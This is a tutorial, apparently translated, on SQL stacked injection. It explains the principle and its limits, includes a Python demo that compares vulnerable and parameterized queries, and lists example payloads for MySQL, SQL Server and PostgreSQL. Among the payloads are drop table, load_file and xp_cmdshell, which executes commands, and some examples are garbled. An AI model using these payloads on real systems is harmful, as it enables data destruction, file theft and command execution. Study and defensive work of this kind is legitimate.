MySQL Injection "Heavenly Book": Stacked Injection

Source: Internet
Author: User

Part III/page-3 Stacked injection

Background-8 Stacked Injection

Stacked injection: as the name suggests, a batch of SQL statements (multiple statements) is executed together. This matches real-world use: on the MySQL command line, a ; is added at the end of each statement to mark its end. So we can ask whether several statements can be used together. This is called stacked injection.

0x01 Introduction to the principle

In SQL, a semicolon (;) marks the end of an SQL statement. Suppose that after a ; ends one statement we go on to construct the next statement: will the two be executed together? This idea is what gives rise to stacked injection. Union injection also combines two statements, so what is the difference between the two? The difference is that the types of statement that union or union all can execute are limited: they can only be used to execute query statements, whereas stacked injection can execute arbitrary statements.

For example, the following example.

When the query is executed, the first statement displays the query information, and the second statement deletes the entire table.

0x02 Limitations of stacked injection

The limitation of stacked injection is that it cannot be executed in every environment: it may be restricted by the API, or the database engine may not support it. Insufficient permissions can also explain why an attacker is unable to modify data or invoke certain programs.

PS: This image is taken from the original text. In my own test environment, PHP+MySQL, stacked queries can be executed, so I have doubts about the MySQL/PHP entry. I suspect the original author's version may differ from mine.

Although we said earlier that stacked queries can execute arbitrary SQL statements, this kind of injection is not perfect. In a web system, the code usually returns only one query result, so the second statement of a stacked injection either produces an error or has its result ignored, and we cannot see its result on the front-end interface.

Therefore, when reading data, we recommend using union injection. Before using stacked injection we also need to know some information about the database, such as table names and column names.
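The API limitation described in this section, shown as an added example that is not part of the original article: Python's built-in sqlite3 stands in for the PHP/MySQL stack, and the function names and sample rows are constructed for illustration. It runs the same stacked input through a multi-statement API, a single-statement API, and a bound parameter, and reports whether the test table survives.

```python
import sqlite3

def fresh_db():
    # Constructed sample data, named after the users/test tables on this page.
    db = sqlite3.connect(":memory:")
    db.executescript(
        "create table users(id integer, username text, password text);"
        "insert into users values (1, 'admin', 'secret');"
        "create table test(id integer);"
    )
    return db

def table_exists(db, name):
    sql = "select count(*) from sqlite_master where type='table' and name=?"
    return db.execute(sql, (name,)).fetchone()[0] == 1

def lookup_multi_statement(db, user_id):
    # Vulnerable: concatenation plus an API that runs every ';'-separated statement.
    # executescript() returns no rows, so nothing from the stacked part is visible.
    db.executescript("select * from users where id=" + user_id + ";")

def lookup_single_statement(db, user_id):
    # Still concatenated (injectable inside one statement), but execute()
    # refuses a second statement, so the stacked part never runs.
    try:
        return db.execute("select * from users where id=" + user_id).fetchall()
    except (sqlite3.Warning, sqlite3.Error) as exc:
        return "rejected: " + type(exc).__name__

def lookup_parameterized(db, user_id):
    # Hardened: the value is bound as data and never parsed as SQL.
    return db.execute("select * from users where id=?", (user_id,)).fetchall()

STACKED = "1;drop table test"  # same shape as the page's MySQL "drop table test" case

def run_demo():
    # Returns, per access path, whether the test table survived the stacked input.
    survived = {}
    for name, lookup in [("multi_statement_api", lookup_multi_statement),
                         ("single_statement_api", lookup_single_statement),
                         ("parameterized", lookup_parameterized)]:
        db = fresh_db()
        lookup(db, STACKED)
        survived[name] = table_exists(db, "test")
    return survived

if __name__ == "__main__":
    print(run_demo())
```

The single-statement API only blocks stacking; the concatenated query in that path is still open to union injection, which is why the bound parameter is the actual fix.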

0x03 Examples for individual databases

In this section, we describe usage for several commonly used databases, covering the basic database operations: create, delete, query and modify. The basic operations for stacked injection on each database are listed below.

MySQL Database

(1) Create a new table: select * from users where id=1;create table test like users;

The statement executes successfully. Next, check whether the new table was actually created.

(2) Delete the test table created above: select * from users where id=1;drop table test;

(3) Query data: select * from users where id=1;select;

(4) Load a file: select * from users where id=1;select load_file('c:/tmpupbbn.php');

(5) Modify data: select * from users where id=1;insert into users(id,username,password) values('+','new','new');

SQL Server Database

(1) Add a table: select * from test;create table sc3(ss CHAR(8));

(2) Delete a table: select * from test;drop table sc3;

(3) Query data: select 1,2,3;select * from test;

(4) Modify data: select * from test;update test set name='test' where id=3;

(5) Execute a stored procedure (the most important case in SQL Server): select * from test where id=1;exec master..xp_cmdshell 'ipconfig'

Oracle Database

As mentioned in the introduction above, Oracle cannot use stacked injection. When two statements are placed on the same line, an error is returned directly: invalid character. We will not try any further here.

PostgreSQL Database

(1) Create a new table: select * from user_test;create table user_data(id DATE);

You can see that the user_data table has been created.

(2) Delete the user_data table created above: select * from user_test;delete from user_data;

(3) Query data: select * from user_test;select;

(4) Modify data: select * from user_test;update user_test set name='modify' where name='Zhang San';
